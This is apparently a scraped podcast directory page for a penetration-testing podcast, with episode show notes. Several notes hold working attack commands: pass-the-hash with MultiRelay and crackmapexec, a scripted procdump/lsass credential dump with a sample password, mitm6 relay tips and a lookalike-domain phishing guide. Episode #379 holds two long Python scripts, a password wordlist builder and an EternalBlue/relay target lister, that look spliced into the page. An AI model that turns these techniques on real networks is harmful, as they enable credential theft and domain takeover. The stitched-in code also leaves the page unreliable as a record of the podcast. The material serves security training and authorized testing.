7 Minute Security

Technology / News / Tech News

Updated 7 days ago

7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.

iTunes Ratings: 49 ratings (distribution 46 / 2 / 1 / 0 / 0)

Great small bits of security
By Infinity dreamer 90 - Feb 20 2019
Thanks for sharing your security secrets!

Brian Johnson
By Caneron Johnson - May 06 2018
Hey this is Cameron Luis Fronodo Johnson and I’m your son bye Dad love you!! 👋

Latest release on Jan 15, 2020

Read more

7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.

Rank #1: 7MS #51: CEH vs. OSCP (audio)

A few people have written in asking whether to pursue the CEH or OSCP (or both). This episode discusses my experience with each cert and hopefully points you in the right direction on which one might be right for you. Here’s the article on CEH I mention during the episode – it has much more…

Apr 07 2015 (7mins)

Rank #2: 7MS #106: A Day in the Life of an Information Security Analyst

A listener wrote in asking some questions about "a day in the life of" a security analyst, so here's my best stab at it!

Oct 30 2015 (10mins)

Rank #3: 7MS #371: Tales of Internal Pentest Pwnage - Part 4

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute

Happy belated 4th of July! Today I've got another fun tale of internal pentest pwnage that comes out of a few recent assessments I did. These tests were really fun because the clients had good defensive measures in place, such as:

  • Having separate accounts for day-to-day operations and administrative/privileged tasks
  • Local Administrator account largely disabled across the enterprise
  • Lean membership in privileged groups (Domain Admins, Enterprise Admins, Schema Admins, etc.)
  • Hard-to-crack passwords!

Will I succeed in getting a solid foothold on this network and (hopefully) escalate to Domain Admin? Check out today's episode to find out!

Jul 12 2019 (44mins)

Rank #4: 7MS #94: Learn How to Burp - Part 1

I've been looking for better ways to learn Burp Suite and I struck gold! Check out my recommendations in today's episode!

Sep 15 2015 (8mins)

Rank #5: 7MS #185: Vulnhub Walkthrough - Lord of the Root

May 03 2016 (7mins)

Rank #6: 7MS #61: Why Local Admin Rights Suck (audio)

Users running as local admins on their machine are a big risk! This episode discusses some reasons why, and also here is the link to the Avecto study I mention regarding how many Microsoft vulnerabilities would be thwarted by removing admin rights.

May 14 2015 (8mins)

Rank #7: 7MS #323: 7 Ways to Not Get Hacked

I'm putting together a general security awareness session aimed at helping individuals and businesses not get hacked. To play off the lucky number 7, I'm trying to boil this list down to 7 key things to focus on. Here's my list thus far:

  1. Passwords
  2. 2FA/MFA
  3. Wifi (put a good password on it, don't use WEP, don't use WPS)
  4. Sign up for HaveIBeenPwned
  5. Update all the things
  6. Block malware/mining with browser plugins
  7. Security awareness training

What do you think? Anything I missed or should consider swapping with another topic? Contact me!

Aug 16 2018 (18mins)

Rank #8: 7MS #353: Tales of Internal Pentest Pwnage - Part 1

Buckle up! This is one of my favorite episodes.

Today I'm kicking off a two-part series that walks you through a narrative of a recent internal pentest I worked on. I was able to get to Domain Admin status and see the "crown jewels" data, so I thought this would be a fun and informative narrative to share. Below are some highlights of topics/tools/techniques discussed:

Building a pentest dropbox

The timing is perfect - my pal Paul (from Project7) and Dan (from PlexTrac) have a two-part Webinar series on building your own $500 DIY Pentest Lab, but the skills learned in the Webinars translate perfectly into making a pentest dropbox. Head to our webinars page for more info.

Securing a pentest dropbox

What I did with my Intel NUC pentest dropbox is build a few VMs as follows:

  • Win 10 pro management box with Bitlocker drive encryption and Splashtop (not a sponsor) which I like because it offers 2FA and an additional per-machine password/PIN. I think I spent $100/year for it.

  • Kali attack box with an encrypted drive (Kali makes this easy by offering you this option when you first install the OS).

Scoping/approaching a pentest

From what I can gather, there are (at least) two popular schools of thought as it relates to approaching a pentest:

  • From the perimeter - where you do a lot of OSINT, phish key users, gain initial access, and then find a path to privilege from there.

  • Assume compromise - assume that eventually someone will click a phishing link and give bad guys a foothold on the network, so you have the pentester bring in a Kali box, plug it into the network, and the test begins from that point.

Pentest narrative

For one of the tests I worked on, here were some successes and challenges I had along the way:

Check out the show notes at 7MS.us as there's lots more good info there!

Mar 22 2019 (42mins)

Rank #9: 7MS #55: OFFTOPIC – What’s in Brian’s Murse? (video)

Ok I don’t really have a murse, but I wanted to do a short video(!) podcast to show you some sorta-security-related gadgets that I’ve been nerding out on the last few weeks.

Apr 22 2015 (6mins)

Rank #10: 7MS #284: The Quest for Critical Security Controls

For a long time I've been electronically in love with the Critical Security Controls. Not familiar with 'em? The CIS site describes them as:

The CIS Controls are a prioritized set of actions that protect your critical systems and data from the most pervasive cyber attacks. They embody the critical first steps in securing the integrity, mission, and reputation of your organization.

Cool, right? Yeah. And here are the top (first) 5 that many organizations start to tackle:

  1. Inventory of Authorized and Unauthorized Devices
  2. Inventory of Authorized and Unauthorized Software
  3. Secure Configurations for Hardware and Software
  4. Continuous Vulnerability Assessment and Remediation
  5. Controlled Use of Administrative Privileges

Google searches will show you that you can definitely buy expensive hardware/software to help you map to the CSCs, but I'm passionate about helping small businesses (and even home networks!) be more secure, so I'm on a quest to find implementable (if that's a word?) ways to put these controls in place.

I'm focusing on control #1 to start, and I've heard great things about using Fingbox (not a sponsor) to get the job done, but I'm also exploring other free options, such as nmap + some scripting magic.

More on today's episode...

Nov 02 2017 (12mins)

Rank #11: 7MS #182: Vulnhub Walkthrough - SickOs

Apr 25 2016 (9mins)

Rank #12: 7MS #188: Vulnhub Walkthrough - DroopyCTF

May 09 2016 (11mins)

Rank #13: 7MS #161: DIY Wifi Network Graphing & Dojo Scavenger Vulnerable Webapp

Feb 29 2016 (8mins)

Rank #14: 7MS #390: Tales of Internal Network Pentest Pwnage - Part 11

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

Today's episode is a twofer. That's right, two tales of internal network pentest pwnage. Whoop whoop! We cover:

  • What the SDAD (Single Domain Admin Dance) and DDAD (Double Domain Admin Dance) are (spoiler: imagine your dad trying to dance cool...it's like that, but more awkward)

  • A good way to quickly find domain controllers in your environment: nslookup -type=SRV _ldap._tcp.dc._msdcs.YOURDOMAIN.SUFFIX

  • This handy script runs nmap against subnets, then Eyewitness, then emails the results to you

  • Early in the engagement I'd highly recommend checking for Kerberoastable accounts

  • I really like Multirelay to help me pass hashes, like:

MultiRelay.py -t 1.2.3.4 -u bob.admin Administrator yourmoms.admin

  • Once you get a shell, run dump to dump hashes!

  • Then, use CME to pass that hash around the network!

crackmapexec smb 192.168.0.0/24 -u Administrator -H YOUR-HASH-GOES-HERE --local-auth

  • Then, check out this article to use NPS and get a full-featured shell on your targets

Dec 06 2019 (1hr 2mins)

Rank #15: 7MS #191: Vulnhub Walkthrough - Kevgir

May 17 2016 (7mins)

Rank #16: 7MS #57: How to Review a Firewall (audio)

In this episode I talk about a few different ways to approach firewall reviews/audits. This document was very helpful in getting my template started. Also check out Nipper if you’re looking for a firewall review/audit tool.

Apr 30 2015 (8mins)

Rank #17: 7MS #215: Installing Ubiquiti EdgeRouter X and AP - Part 1

Jul 21 2016 (9mins)

Rank #18: 7MS #226: DIY $500 Pentesting Lab - Part 3

Sep 02 2016 (8mins)

Rank #19: 7MS #176: DIY SSH Honeypot with Cowrie

Apr 12 2016 (8mins)

Rank #20: 7MS #319: Sniper and Firewalls Full of FUD

Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription.

In today's episode, I talk about my fun experience using the Sn1per automated pentesting tool. It's really cool! It can scan your network, find vulnerabilities and exploit them - all in one swoop! It also does a nice one-two punch of OSINT+recon if you feed it a domain name.

And, I tell a painful story about how a single checkbox setting in a firewall cost me a lot of hours and tears. You can LOL at me, learn from my pain, and we'll all be better for it.

Jul 20 2018 (18mins)

7MS #396: Tales of Internal Pentest Pwnage - Part 13

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

In last week's episode I was very close to potentially synching up some very sensitive data with my super secret back door account. In this episode, we resolve the cliffhanger and talk about:

python /opt/hashcombiner/hash_combiner.py user_hash hash_password | sort > combined.txt
cut -d ':' -f 2 combined.txt > passwords.txt
ruby /opt/pipal/pipal.rb passwords.txt > pip.txt

  • The procdump + lsass trick is still really effective (though sometimes AV gobbles it)

(See full show notes at 7ms.us!)

Jan 15 2020 (53mins)

7MS #395: Tales of Internal Pentest Pwnage - Part 12

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

In today's tale of pentest pwnage I got to try some tools and tricks for the first time! Here are the key points/takeaways from this test:

  • It's great to have additional goals to achieve in a network pentest outside of just "get DA"

  • PayloadsAllTheThings has a great section on Active Directory attacks

  • Using mitm6 and ntlmrelayx is now my new favorite thing thanks to The Cyber Mentor's fantastic video showing us exactly how to launch this attack!

  • If you're scared of running mitm6 and accidentally knocking folks off your network, setup your Kali box to reboot in a few minutes just to be safe. Do something like:

shutdown -r +15 "Rebooting in 15 minutes just in case I mitm6 myself right off this box!"

  • When mitm6+ntlmrelay dumps out a series of html/json files with lists of users, groups, etc., read through them! Sometimes they can include treats...like user passwords in the comment fields!

  • Use crackmapexec smb IP.OF.DOMAIN.CONTROLLER -u username -p password to verify if your domain creds are good!

There are a bunch of people I need to thank because their tools/encouragement/advice played a part in making the test successful. See today's show notes on 7ms.us for more info!

Jan 09 2020 (1hr 5mins)

7MS #394: DIY Pwnagotchi

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

Sung to the tune of "Do You Wanna Build a Snowman"

Do you wanna build a Pwnagotchi?
Even though you thought you never would?
I really hope mine doesn't ever break
It grabs wifi handshakes
It does it really good!

Today's episode is all about Pwnagotchi, a cute little device whose sole purpose in life is to gobble WPA handshakes! Check out today's episode to learn more about the device (as well as some pwn-a-gotchas that you should be aware of), and then come to the next 7MS user group meeting to build your own! If you can't make this meeting I'll also do a Webinar version of the presentation - likely in February or March, so stay tuned to our Webinars page.

At the end of today's episode I talk about my troll foot. I fractured my ankle on Christmas Eve and was basically this lady. At the end of the day I received an avulsion fracture and it kinda made my Christmas stink. But 2020 is gonna absolutely rip, friends!

Jan 03 2020 (43mins)

7MS #393: Interview with Peter Kim

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Peter Kim of The Hacker Playbook series joins me today to talk about all things hacking! Peter runs a popular west coast hacker meetup, and I was fortunate enough to attend his Real World Red Team training, which I wrote a review about here. Peter sat down with me over Skype to talk about:

  • The origin story of The Hacker Playbook series (btw please buy it, don't steal it! :-)
  • How do you balance work and family life when trying to pwn all the things and have a personal life and significant other?
  • How do you break into security when your background is in something totally different, like a mechanic, artist or musician?
  • What are some good strategies when approaching a red team engagement - do you always start "fresh" from the perimeter? Do you assume compromise and throw a dropbox on the network? Some combination of both?
  • What are some other low-hanging fruit organizations can use to better defend their networks?
  • Do you run across some of these good defenses - like honeypots - in your engagements?
  • If you could put on a wizard hat and solve one security problem (be it technical, personnel or something else) what would it be?

...and more!

Dec 26 2019 (1hr 24mins)

7MS #392: LAPS Reloaded

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

Today's episode is all about LAPS - Microsoft's Local Administrator Password solution. In a nutshell, LAPS strengthens and randomizes the local administrator password on the systems across your enterprise. We talked about it way back in episode 252 but figured it was worth a revisit because:

  • It's awesome

  • It's free

  • People still haven't heard of it when I share info about it during conference talks!

  • I've got a full write-up of how to install LAPS here

  • At a recent conference people asked me two awesome edge case questions:

    • What if I aggressively delete inactive machines from my AD - does the LAPS attribute go with it?

    • What do I do if I use Deep Freeze and the LAPS password attribute in AD keeps getting out of sync with the actual password on systems because of Deep Freeze's freeze/thaw times?

Dec 19 2019 (24mins)

7MS #391: Securing Your Family During and After a Disaster - Part 3

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

This is part three of this series - part 1 talked about a fire that destroyed my family's home and vehicles, and part 2 was about how to get "back on the grid" and start working with the insurance machine to find a new "normal."

Today, I want to answer some burning questions many of you have been asking:

  • Have you hit rock bottom yet? (Spoiler alert: no, but I tell you about a moment I almost lost my mind after dropping a shoe in a storm drain)

  • How long do you get to keep rental cars before you have to replace your permanent vehicles?

  • Do you have to stay in a hotel the whole time your house is rebuilt?

  • What about if you get placed in temporary housing - do you have to rebuy your beds/furniture/clothes/etc. and keep them at your temp place, then move them again once your house is rebuilt?

  • What adjustments might you want to make to your insurance policies to make sure you have the right amount of coverage in case of emergency?

Dec 12 2019 (49mins)

7MS #389: Securing Your Family During and After a Disaster - Part 2

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

In part 1 of this series we talked about a tragic event my family experienced a few weeks ago: we lost our house and vehicles in a fire. Today I'll talk about:

  • How to get "back on the grid" when starting with nothing but the clothes on your back. Checklist includes:
    • New licenses
    • New ATM/credit cards
    • Rental vehicles
    • Temporary housing
  • How the most wonderful people in the world come out of your past to lift you up and help you out - and how it may not be the people you expect
  • What's it like working with the insurance machine? What do they help with and not help with?
  • How much does it suck to lose all your stuff? (Spoiler alert: a lot)
  • The relief (as weird as that sounds) that comes with losing all your material things

Thanks again for your support via GoFundMe

Nov 21 2019 (36mins)

7MS #388: Securing Your Family During and After a Disaster - Part 1

In today's episode I talk about how my family's house and two vehicles were recently destroyed in a fire. The Johnson family is all ok - no injuries, thank God. However, this has turned our world upside down, and over the past week of sleepless nights I've thought a lot about how this tragedy could help others ensure their families are safe and secure both during and after a disaster. I imagine this series will go something like this:

  • Today: Talk about "day zero" - everything that happened on the day of the fire
  • Part 2: Talk about what it's like working with insurance, 3rd party vendors, getting rental cars, finding temporary housing, and basically getting "back on the grid" starting with NO identification or credit cards
  • Part 3: Talk about the people part of all this. What are the effects on the family? On the community? On our health? On our faith?

Some folks in the security community were kind enough to setup a GoFundMe if you'd like to support my family during this time.

Nov 15 2019 (1hr 14mins)

7MS #387: How to Succeed in Business Without Really Crying - Part 7

Today's episode features a few important changes to the tools and services I use to run 7MS:

Additionally, we talk about a few biz-specific challenges:

  • How do you (comfortably) talk about money with a client before the SOW hits their inbox?
  • If you're a small security consultancy of 2-5 people, do you lie about your company size to impress the big client, or tell the truth and brag about the advantages a nimble team can bring?

Nov 11 2019 (56mins)

7MS #386: Interview with Ryan Manship and Dave Dobrotka - Part 4

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

I'm sorry it took me forever and a day to get this episode up, but I'm thrilled to share part 4 (the final chapter - for now anyways) of my interview with the red team guys, Ryan and Dave!

In today's episode we talk about:

  • Running into angry system admins (that are either too fired up or not fired up enough)
  • Being wrong without being ashamed
  • When is it necessary to make too much noise to get caught during an engagement?
  • What are the top 5 tools you run on every engagement?
  • How do you deal with monthly test reports indefinitely being a copy/paste of the previous month's report?
  • How do you deal with clients who scope things in such a way that the test is almost impossible to conduct?
  • How do you deal with colleagues who take findings as their own when they talk with management?
  • How do you work with clients who don't know why they want a test - except to check some sort of compliance checkmark?
  • What is a typical average time to complete a pentest on a vendor (as part of a third-party vendor assessment)?
  • How could a fresh grad get into a red team job?
  • What do recruiters look for in candidates seeking red team positions?
  • If a red team is able to dump a whole database of hashes or bundle of local machine hashes, should they crack them?
  • What do you do when you're contracted for a pentest, but on day one you realize the org is not at all ready for one?
  • What's your favorite red team horror story?

Nov 01 2019 (1hr 24mins)

7MS #385: A Peek into the 7MS Mail Bag

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

Today I'm joined by a very special guest: Mrs. 7MS! She joins me on a road trip to northern MN, reads me some questions from the 7MS mail bag, and we tackle them together (with a side order of commentary on weddings, overheating iPads, cheap hotels and the realization that this is likely the first - and only episode that Mrs. 7MS has ever listened to).

Links to things discussed this episode:

Wireless pentest certs:

Good/free pentest training options:

Free logging/alerting solutions for SMBs:

Oct 22 2019 (44mins)

7MS #384: Creating Kick-Butt Credential-Capturing Phishing Campaigns

In this episode I talk about some things I learned about making your own kick-butt cred-capturing phishing campaign and how to do so on the (relatively) quick and (relatively) cheap! These tips include:

  • Consider this list of top 9 phishing simulators.
  • Check out GoPhish!
  • Then spin up a free tier Kali AWS box
  • Follow the instructions to install GoPhish and get it running on your AWS box
  • Use the Expired Domains site to buy up a domain that is similar to your victim - maybe just one character off - but has been around a while and has a good reputation
  • Add a G Suite or O365 email account (or whatever email service you prefer) to the new domain
  • Create a convincing cred-capturing portal on GoPhish - I used some absolutely disgusting and embarrassing HTML like this (see show notes on 7ms.us):
  • Use this awesome article to secure your fancy landing page with a LetsEncrypt cert!
  • Have fun!!!

Oct 12 2019 (50mins)

7MS #383: Tales of Internal Network Pentest Pwnage - Part 10

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

This episode is a "sequel" of sorts to part 9 where I was helping another company tag-team an internal network pentest. (In announcer voice) "When we last left our heroes we had..."

  • Relayed one high-priv cred from one box to another
  • Dumped and cracked a local machine's hash
  • Passed that hash around the network
  • Found (via Bloodhound) some high value targets we wanted to grab domain admin creds from
  • Set the wdigest flag via CrackMapExec

Today, we talk about how we came back to the pentest a few days later and scripted the procdump/lsass operation to (hopefully) grab cleartext credentials from these high value targets. Here's how we did it:

mkdir /share
wget https://live.sysinternals.com/procdump64.exe
screen -R smb
/opt/impacket/examples/smbserver.py -smb2support share /share

Then, we ran the following CME commands to copy procdump over to the victim machine, create the dump, take the dump, then delete procdump.exe:

crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'copy "\\192.168.55.60\share\procdump64.exe" "c:\users\public\procdump64.exe"'

(more on today's episode show notes)

Oct 01 2019 (30mins)

7MS #382: Tales of Internal Network Pentest Pwnage - Part 9

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

Today's episode is about a pentest that was pretty unique for me. I got to ride shotgun and kind of be in the shadows while helping another team pwn a network.

This was an especially interesting one because the client had a lot of great security defenses in place, including:

  • Strong user passwords
  • A SIEM solution that appeared to be doing a great job

We did some looking for pwnage opportunities such as:

  • Systems missing EternalBlue patch
  • Systems missing BlueKeep patch

What got us a foot in the door was the lack of SMB signing. Check this gist to see how you can use RunFinger.py to find hosts without SMB signing, then use Impacket and Responder to listen for - and pass - high-priv hashes.

Side note: I'm working on getting a practical pentesting gist together in the vein of Penetration Testing: A Hands-On Introduction to Hacking and Hacker Playbook.

Sep 24 2019 (34mins)

7MS #381: DIY $500 Pentesting Lab Deployment Tips

For Windows VMs

  • Take a snapshot right after the OS is installed, as (I believe) the countdown timer for Windows evaluation mode starts upon first "real" boot.
  • Want to quickly run Windows updates on a fresh Win VM? Try this (here's the source):
powershell Install-PackageProvider -Name NuGet -Force
powershell Install-Module PSWindowsUpdate -force
powershell Set-ExecutionPolicy bypass
powershell Import-Module PSWindowsUpdate
powershell Get-WindowsUpdate
powershell Install-WindowsUpdate -AcceptAll -AutoReboot
  • To turn on remote desktop:
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
  • To set the firewall to allow RDP:
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
  • To stop the freakin' Windows hosts from going to sleep:
powercfg.exe -change -standby-timeout-ac 0
  • To automate the install of VMWare tools, grab the package from VMWare's site, decompress it, then:
setup64.exe /s /v "/qn reboot=r"
  • To set the time zone via command line, run tzutil /l and then you can set your desired zone with something like tzutil /s "Central Standard Time"

For Linux VMs

  • Get SSH keys regenerated and install/run openssh server:
apt install openssh-server -y
mkdir /etc/ssh/default_keys
mv /etc/ssh/ssh_host_* /etc/ssh/default_keys/
dpkg-reconfigure openssh-server
systemctl enable ssh.service
systemctl start ssh.service

Next user group meeting September 30!

Sep 18 2019

38mins

7MS #380: Tales of Internal Network Pentest Pwnage - Part 8

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

Today's episode is a continuation of episode #379, where we:

  • Conducted general nmap scans (and additional scans specifically looking for EternalBlue)
  • Sucked our nmap scans into EyeWitness
  • Captured and cracked some creds with Paperspace
  • Scraped the company's marketing Web site with brutescrape and popped a domain admin account (or so I thought!)

Today, the adventure continues with:

  • Checking the environment for CVE-2019-1040
  • Picking apart the privileges on my "pseudo domain admin" account
  • Making a startling discovery about how almost all corp passwords were stored

Enjoy!

Sep 05 2019

28mins

7MS #379: Tales of Internal Network Pentest Pwnage - Part 7

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

This episode, besides talking about a man who screamed at me for not being on my cell phone, covers another tale of internal network pentest pwnage! Topics/tactics covered include:

  • Review of setting up your DIY pentest dropbox
  • Choosing the right hardware (I'm partial to this NUC)
  • Running Responder to catch creds
  • Using EyeWitness to snag screenshots of stuff discovered with nmap scanning
  • Nmap for EternalBlue with nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24
  • Running SharpHound to get a map of the AD environment
  • Cracking creds with Paperspace
  • When cracking, make sure to scrape the customer's public Web sites for more wordlist ideas!
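
The "scrape the customer's Web site for wordlist ideas" step (and the brutescrape run mentioned in the previous episode) as an added example, not brutescrape's or CeWL's code: pull visible words out of the marketing pages, rank them by frequency, and expand each one with the suffix and case rules people actually use. The two HTML pages are constructed stand-ins; fetch_pages() is the network helper you would point at the real site.

```python
"""Site-scrape wordlist builder in the spirit of brutescrape/CeWL (added example,
not brutescrape's code). SAMPLE_PAGES is constructed; use fetch_pages() on an
engagement."""
import re
from collections import Counter
from html.parser import HTMLParser
from typing import Dict, Iterable, List, Set
from urllib.request import urlopen

SAMPLE_PAGES: Dict[str, str] = {   # constructed HTML, not a real site
    "https://example.test/about": """<html><head><title>Acme Widgets - About</title>
        <script>var tracker = 'ignored';</script></head>
        <body><h1>Welcome to Acme Widgets</h1>
        <p>Founded in 1987 in Rochester, Acme builds the Thunderbolt and Skyhawk
        widget lines. Our mascot, Sparky, loves it here.</p>
        <style>.hidden { display: none }</style></body></html>""",
    "https://example.test/careers": """<html><body><h2>Join the Acme team</h2>
        <p>Offices in Rochester and Duluth. Go Thunderbolts!</p></body></html>""",
}


class VisibleText(HTMLParser):
    """Collect text nodes, skipping <script> and <style> bodies."""
    SKIP = {"script", "style"}

    def __init__(self) -> None:
        super().__init__()
        self.parts: List[str] = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in self.SKIP:
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in self.SKIP and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.parts.append(data)


def extract_words(html: str, min_len: int = 4) -> List[str]:
    """Alphanumeric tokens of at least min_len characters, original case kept."""
    p = VisibleText()
    p.feed(html)
    p.close()
    return re.findall(r"[A-Za-z0-9]{%d,}" % min_len, " ".join(p.parts))


def build_wordlist(pages: Dict[str, str], min_len: int = 4, min_count: int = 1) -> List[str]:
    """Lower-cased words ordered by how often they appear across all pages."""
    counts: Counter = Counter()
    for html in pages.values():
        counts.update(w.lower() for w in extract_words(html, min_len))
    return [w for w, n in counts.most_common() if n >= min_count]


def mangle(base: str, years: Iterable[str] = ("2018", "2019")) -> Set[str]:
    """Cheap rules mirroring how people build passwords from company and
    product names; the output is a hashcat dictionary, not a rule file."""
    cases = {base, base.capitalize(), base.upper()}
    suffixes = ["", "!", "1", "123"]
    for y in years:
        suffixes += [y, y + "!"]
    return {c + s for c in cases for s in suffixes}


def mangled_wordlist(pages: Dict[str, str], **kw) -> List[str]:
    """Frequency-ordered base words, each expanded; duplicates removed."""
    out: List[str] = []
    seen: Set[str] = set()
    for w in build_wordlist(pages, **kw):
        for cand in sorted(mangle(w)):
            if cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


def fetch_pages(urls: Iterable[str], timeout: float = 10.0) -> Dict[str, str]:
    """Network helper for real use; not exercised by the offline sample."""
    return {u: urlopen(u, timeout=timeout).read().decode("utf-8", "replace") for u in urls}


if __name__ == "__main__":
    for line in mangled_wordlist(SAMPLE_PAGES):
        print(line)
```

Redirect the output to a file and pass it to hashcat alongside the usual wordlists; the company name, product names and the founding year tend to sit at the top of the ranking, which is exactly where the hits come from.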

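The EternalBlue sweep above produces a lot of output across a /24; this added example (not the podcast's tooling) turns `nmap -oX` results from the ms17-010 script, plus the smb2-security-mode script run in the same sweep, into two target lists. SAMPLE_NMAP_XML is constructed to mimic nmap's XML, and the script-output phrases matched on ("State: VULNERABLE", "not required") are assumed from those two scripts' output. Keep in mind smb-vuln-ms17-010 only works against hosts that still speak SMBv1.

```python
"""nmap -oX -> target lists for EternalBlue and NTLM relay (added example, not
the podcast's tooling). SAMPLE_NMAP_XML is constructed; the matched phrases are
assumed from the smb-vuln-ms17-010 and smb2-security-mode script output."""
import sys
import xml.etree.ElementTree as ET
from typing import Dict, List

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -Pn -p445 --open --script smb-vuln-ms17-010,smb2-security-mode 192.168.0.0/24">
  <host><status state="up"/><address addr="192.168.0.10" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="&#xa;  VULNERABLE:&#xa;  Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)&#xa;    State: VULNERABLE&#xa;    IDs:  CVE:CVE-2017-0143"/>
      <script id="smb2-security-mode" output="&#xa;  2.02: &#xa;    Message signing enabled but not required"/>
    </hostscript>
  </host>
  <host><status state="up"/><address addr="192.168.0.11" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
    <hostscript>
      <script id="smb2-security-mode" output="&#xa;  3.11: &#xa;    Message signing enabled and required"/>
    </hostscript>
  </host>
  <host><status state="up"/><address addr="192.168.0.12" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
    <hostscript>
      <script id="smb2-security-mode" output="&#xa;  2.02: &#xa;    Message signing is disabled and not required!"/>
    </hostscript>
  </host>
</nmaprun>
"""


def classify_signing(output: str) -> str:
    """Map the script's one-line verdict to required / enabled / disabled."""
    text = output.lower()
    if "not required" in text:
        return "disabled" if "disabled" in text else "enabled"
    if "required" in text:
        return "required"
    return "unknown"


def parse_nmap(xml_text: str) -> Dict[str, Dict[str, str]]:
    """Per-host view: ms17_010 ('vulnerable' / 'unknown') and signing state."""
    results: Dict[str, Dict[str, str]] = {}
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        info = {"ms17_010": "unknown", "signing": "unknown"}
        for script in host.iter("script"):   # port scripts and host scripts alike
            out = script.get("output", "")
            if script.get("id") == "smb-vuln-ms17-010" and "State: VULNERABLE" in out:
                info["ms17_010"] = "vulnerable"   # "State: NOT VULNERABLE" does not match
            elif script.get("id") == "smb2-security-mode":
                info["signing"] = classify_signing(out)
        results[addr.get("addr")] = info
    return results


def eternalblue_targets(results: Dict[str, Dict[str, str]]) -> List[str]:
    return [ip for ip, i in results.items() if i["ms17_010"] == "vulnerable"]


def relay_targets(results: Dict[str, Dict[str, str]]) -> List[str]:
    """ntlmrelayx -tf format: one smb://host per line, signing not required."""
    return [f"smb://{ip}" for ip, i in results.items() if i["signing"] in ("enabled", "disabled")]


if __name__ == "__main__":
    xml_text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NMAP_XML
    res = parse_nmap(xml_text)
    print("# EternalBlue (MS17-010) candidates")
    print("\n".join(eternalblue_targets(res)))
    print("# relay targets (targets.txt)")
    print("\n".join(relay_targets(res)))
```

Hosts that show as both EternalBlue-vulnerable and relayable are the ones to report first; the relay list is what `ntlmrelayx.py -tf targets.txt -smb2support` consumes while Responder does the poisoning.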
Aug 30 2019

43mins

7MS #378: Interview with Zane West of Proficio

In today's episode, I sit down with Zane West of Proficio. Zane has been in information security for more than 20 years, starting out in the "early days" as a sysadmin and then moving up into a global infrastructure architect role in the banking world. Today Zane manages Proficio's solution and product development. I sat down with Zane over Skype to talk about how companies can better analyze and defend their networks against attacks. Specifically, we talk about:

  • How important is it to have an IT background before you jump into security?
